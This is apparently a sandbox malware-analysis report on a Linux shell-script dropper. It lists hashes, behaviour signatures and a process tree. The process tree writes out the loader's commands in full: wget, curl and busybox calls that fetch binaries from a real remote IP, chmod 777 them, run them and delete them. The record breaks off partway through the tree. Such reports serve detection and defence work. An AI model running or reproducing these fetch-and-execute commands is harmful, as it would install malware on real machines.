Analysis
-
max time kernel
12s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
-
Size
10KB
-
MD5
5ecd8e3f2eb51a7dc020f24e33b8cc57
-
SHA1
be4322853738933aa75ef6ade68437e1c6290afe
-
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
-
SHA512
f43f15b94f1eab3f628a22d9dec691977126ced5801a808fc091f5847ab5cb1bf5bce49da1056fa82a1c14ccecddf1d0c76ecab6fcb74951c56b7c87a331dce1
-
SSDEEP
192:eyoVNmlHxyrasCqOpG+qpOVNmlHx3qOpG+0:e/VNmlRyrasH8VNmlRm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1560 chmod 1566 chmod 1512 chmod 1518 chmod 1542 chmod 1572 chmod 1626 chmod 1656 chmod 1524 chmod 1548 chmod 1602 chmod 1614 chmod 1506 chmod 1596 chmod 1620 chmod 1608 chmod 1638 chmod 1650 chmod 1530 chmod 1536 chmod 1584 chmod 1632 chmod 1644 chmod 1662 chmod 1578 chmod 1554 chmod 1590 chmod 1668 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ 1507 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 1513 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP 1519 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM 1525 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 1531 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W 1537 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p 1543 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm 1549 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 1555 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU 1561 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf 1567 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 1573 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm 1579 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX 1585 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W 1591 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 1597 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm 1603 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 1609 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU 1615 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf 1621 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 1627 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p 1633 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX 1639 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm 1645 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 1651 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP 1657 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM 1663 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ 1669 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1571 busybox 1573 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 1624 curl 1627 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 1628 rm 1569 wget 1570 curl 1574 rm 1623 wget 1625 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 curl File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p curl File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO curl File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 curl File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU curl File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf curl File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 curl File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf curl File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM curl File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W curl File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm curl File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU curl File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 curl File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W curl File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 curl File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm curl File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP curl File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ curl File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm curl File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm curl File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ curl File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP curl File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO curl File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 curl File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p curl File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX curl File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX curl File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM curl
Processes
-
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh1⤵PID:1498
-
/bin/rm/bin/rm bins.sh2⤵PID:1499
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:1500
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Writes file to tmp directory
PID:1501
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:1502
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:1507
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:1508
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:1509
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:1511
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:1513
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:1514
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:1517
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:1519
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:1520
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:1521
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:1523
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:1526
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:1527
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:1529
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:1532
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:1533
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:1535
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:1538
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:1541
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:1544
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:1547
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:1550
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:1551
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:1553
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:1556
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:1559
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:1562
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:1565
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:1568
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:1571
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1573
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:1574
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:1577
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:1580
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:1581
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:1583
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:1586
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:1589
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:1592
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:1593
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:1595
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:1598
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:1601
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:1604
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:1605
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:1607
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:1610
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:1613
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:1616
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:1619
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:1622
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:1623
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:1625
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1627
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:1628
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:1631
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:1634
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
